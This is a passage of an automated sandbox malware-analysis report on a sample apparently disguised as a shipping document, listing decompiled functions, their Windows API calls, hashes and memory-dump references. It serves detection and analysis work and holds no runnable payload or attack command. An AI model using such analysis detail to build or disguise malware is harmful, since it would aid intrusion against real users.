                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: %
                    • API String ID: 0-2291192146
                    • Opcode ID: 6109939ac2fd63977b264851af81f2d684bc8271582f07dee7d8c47c960f4935
                    • Instruction ID: 8b6994a51e39e224cfde73d229e41ff5e18d4157cacf5fd27bd7ce568e2a66b0
                    • Opcode Fuzzy Hash: 6109939ac2fd63977b264851af81f2d684bc8271582f07dee7d8c47c960f4935
                    • Instruction Fuzzy Hash: D9B1AF71D0010A9ACF24EF94C881AEEBBB4FF44310F506426E952B72D5DB319EE6CB61
                    Function 00E7AFB7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __itow_s
                    • String ID: xb$xb
                    • API String ID: 3653519197-3775679291
                    • Opcode ID: 7c2a8a0e7b7449856b65219f8cc1d9e46f9d943314c31db7ca3ef128374f407e
                    • Instruction ID: 18aa5216305934a60b5670eada1da39ed2323f076e46b1b6235f7888f1eee38e
                    • Opcode Fuzzy Hash: 7c2a8a0e7b7449856b65219f8cc1d9e46f9d943314c31db7ca3ef128374f407e
                    • Instruction Fuzzy Hash: 69B14C70A00209EFDB14DF54C891EAAB7F9FF58304F14D459F949AB292EB71E981CB60
                    Function 00E6B038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • __wcsnicmp.LIBCMT ref: 00E6B0B9
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B182
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: 88bd3c4ee3d7da37fbb75ec59dfc7a398c52c9c5dc0606f60cb13cdbd7cc9501
                    • Instruction ID: 0bd8bb3246261e04c55a21b723cfe9443f4ca28379743d5cc3d1c620b59c91e3
                    • Opcode Fuzzy Hash: 88bd3c4ee3d7da37fbb75ec59dfc7a398c52c9c5dc0606f60cb13cdbd7cc9501
                    • Instruction Fuzzy Hash: 82618F75A40215AFCB14DF98D891EAEB7F4AF49350F105069F956FB292DB30AE80CB90
                    Function 00E488DA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    • Opcode ID: 3638781d95057cbcc67d42282debc7e31162377a1939ad3edc6f1cc6c34bb9e8
                    • Instruction ID: 0d14909ead379bc8ca109c29cf32060fdd91046fe29436ec4b031a219d7eb5b5
                    • Opcode Fuzzy Hash: 3638781d95057cbcc67d42282debc7e31162377a1939ad3edc6f1cc6c34bb9e8
                    • Instruction Fuzzy Hash: B1515FB0A00609DFDB64CF68D580AEEB7F1FF45308F14951AE85AE7240EB31A995CB51
                    Function 00E12AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E12AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E12AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: e54670f3471d2c544a446b3417215c974fe673c76c947be4f9b1720fae14e4c0
                    • Instruction ID: 787901321146cfdead55ea54a52d8d9c6f6f8b7cd0f25be81e97cf8480fbf650
                    • Opcode Fuzzy Hash: e54670f3471d2c544a446b3417215c974fe673c76c947be4f9b1720fae14e4c0
                    • Instruction Fuzzy Hash: 975167B15187449BD320AF14DC86BAFBBF8FB84310F41884CF2D9610A2DB709968CB66
                    Function 00E697DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E0506B: __fread_nolock.LIBCMT ref: 00E05089
                    • _wcscmp.LIBCMT ref: 00E698CD
                    • _wcscmp.LIBCMT ref: 00E698E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: a2a98b4d195eeb9898e0e00b4f517ece1fdc65cc8e8cf4c94cb3225d9b5d57a4
                    • Instruction ID: 94f5acfc26bf0e60916c1c69284002a4be9bfc090c8638967b77779b617181a3
                    • Opcode Fuzzy Hash: a2a98b4d195eeb9898e0e00b4f517ece1fdc65cc8e8cf4c94cb3225d9b5d57a4
                    • Instruction Fuzzy Hash: 57410572A4061ABADF209BA0DC85FEFB7FDDF45750F00146AB900F7181DA71AD458BA1
                    Function 00E408CD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID: Dd$Dd
                    • API String ID: 1473721057-2413357308
                    • Opcode ID: 214d1fc77a0546f705b4932c95e2e732420962671171ef134f3cd66b16e0a054
                    • Instruction ID: f38721776144f81c2faeb301994bf096b7e630fef97b178a69e87c42c6d6a323
                    • Opcode Fuzzy Hash: 214d1fc77a0546f705b4932c95e2e732420962671171ef134f3cd66b16e0a054
                    • Instruction Fuzzy Hash: 84511975604345CFD754CF19C480A1ABBF1BF99344F58A82CE995AB3A1D331EC85CB42
                    Function 00E726A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E726B4
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E726EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: c7601543d087e24e2d9a0db066a35f694dd4fbb0f4c5e30265d6304759276a7e
                    • Instruction ID: c4aa7870e0feec709a5dcf7305cddd37f6de104f7e23e2c732b896a561640a89
                    • Opcode Fuzzy Hash: c7601543d087e24e2d9a0db066a35f694dd4fbb0f4c5e30265d6304759276a7e
                    • Instruction Fuzzy Hash: AC314671900119AFDF05EFA4CC85EEEBFB8FF08310F00506AF908B6166DA315A46CB60
                    Function 00E87AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E87B93
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E87BA8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: '
                    • API String ID: 3850602802-1997036262
                    • Opcode ID: cedb9d2220fa7a455dfd7885f740007f99734e7b9b7c4a23865b4b0ffd02855a
                    • Instruction ID: 36ae0ac10734061945297fb5b4767b03d88516870c73f7b90d10da9a8afebdd9
                    • Opcode Fuzzy Hash: cedb9d2220fa7a455dfd7885f740007f99734e7b9b7c4a23865b4b0ffd02855a
                    • Instruction Fuzzy Hash: AC411675A042099FDB14DF69C881BDABBF6FB08300F20116AE948AB391D731E941CFA0
                    Function 00E86A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00E86B49
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E86B85
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 7b51ccbbc789585db6cd2e452bc181e7c9f0a01294cf0436162cd40bbf6c2345
                    • Instruction ID: d33b236f8fd6d1a989fc7dd4ec281d9f47c1baa9e9cd52cb8500a1df0888ccb9
                    • Opcode Fuzzy Hash: 7b51ccbbc789585db6cd2e452bc181e7c9f0a01294cf0436162cd40bbf6c2345
                    • Instruction Fuzzy Hash: 36317071110604AEEB14AF64CC81AFB73A9FF88728F10A619F99DE7190DB31AC81D760
                    Function 00E62B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E62C09
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E62C44
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: c70a63ec4fd094276263a5c5cdd2b5ed8b6fc44721d795d39ecb6a77439158b7
                    • Instruction ID: 3fadf790e4537b159c085360f11eb62b3c2d639f29ce11fdc916814e2cdaef39
                    • Opcode Fuzzy Hash: c70a63ec4fd094276263a5c5cdd2b5ed8b6fc44721d795d39ecb6a77439158b7
                    • Instruction Fuzzy Hash: 9A31F531A406099FEB348F58E985BAEFBF8FF04394F14502DEE85B61A1D7709A44CB10
                    Function 00E86706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86793
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E8679E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 4fb5e95ede313b9af0d594c848f1c9b1d15f16d4cd083b6ce726a22ab34272ce
                    • Instruction ID: bcf4e7e0c21aec373b3a7303f3c4f59059effa0d1f0fb746b57b4b9e7c369429
                    • Opcode Fuzzy Hash: 4fb5e95ede313b9af0d594c848f1c9b1d15f16d4cd083b6ce726a22ab34272ce
                    • Instruction Fuzzy Hash: 8E1186752002086FEF11AF14DD81EFB376AEB44368F105126F91CA7290E6329C5197A0
                    Function 00E86C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • GetWindowRect.USER32(00000000,?), ref: 00E86CA3
                    • GetSysColor.USER32(00000012), ref: 00E86CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: b0e51b2e1f8b40d330ae8e862aa08c8f4a54c1b62225a30c15d8071be83ff36a
                    • Instruction ID: e1e7baf99bf79482d944b19ca165495781e381142d51623a37c729415685766e
                    • Opcode Fuzzy Hash: b0e51b2e1f8b40d330ae8e862aa08c8f4a54c1b62225a30c15d8071be83ff36a
                    • Instruction Fuzzy Hash: 43215972610209AFDB04EFA8DC45AFABBA8EB08304F005629F959E2250E735E860DB50
                    Function 00E86952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00E869D4
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: a74a670328d7320feb47656deb4a3e0b9c4a60aac297c50a0975a7ff44b8f850
                    • Instruction ID: d58cbcf3c3c06dea34a704817aa7619c77e2bd09b6ff5d647d901d55e7f2c32c
                    • Opcode Fuzzy Hash: a74a670328d7320feb47656deb4a3e0b9c4a60aac297c50a0975a7ff44b8f850
                    • Instruction Fuzzy Hash: 8A116D71500204AFEB116F64DC40AEB37A9EB85378F606724F9ACB71D0C631DC919760
                    Function 00E62CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E62D1A
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E62D39
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                    • Instruction ID: 456c6f35f352430b135a654960055f2240d51e8b218e330a303cb782bd537180
                    • Opcode Fuzzy Hash: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                    • Instruction Fuzzy Hash: E4110832E41914EFDB21DB58EC44FADB7B9AB05384F142139EE15BB2A0D731AD05C792
                    Function 00E722EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E72342
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E7236B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
                    • Instruction ID: 461a6e7ff3341bfd96645ff78a1ca3f9c7f2b4a5a9340818876c18943e7a79aa
                    • Opcode Fuzzy Hash: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
                    • Instruction Fuzzy Hash: E611E070501626BADB248F128C84EFBFBA8EF05355F10E22EFA4D76100D2786881D6F0
                    Function 00E10A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C26,00EC52F8,?,?,?), ref: 00E10ACE
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • _wcscat.LIBCMT ref: 00E45010
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: S
                    • API String ID: 257928180-3334745618
                    • Opcode ID: c370f7a57405398488380eaa63b22c60cd1b236ce545a2de87e9ce07ee00a713
                    • Instruction ID: ce43bc4d3c7dee485fd6349020f3dcb8347833ebae4a9659dcd107edbd0fb8b7
                    • Opcode Fuzzy Hash: c370f7a57405398488380eaa63b22c60cd1b236ce545a2de87e9ce07ee00a713
                    • Instruction Fuzzy Hash: 501165359042089BCB00FB64DD42EDD77F8EF18394B0060A5B98DF7295DAB1BBC59B51
                    Function 00E590C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E59135
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 3fa963adf1cdde97111e81b003973df71929b1aa615a60cacb2aacea4ee82f62
                    • Instruction ID: b3f83ea51e7190c6862beb305e27555066e7152fd76230d6f33a794dd59793f2
                    • Opcode Fuzzy Hash: 3fa963adf1cdde97111e81b003973df71929b1aa615a60cacb2aacea4ee82f62
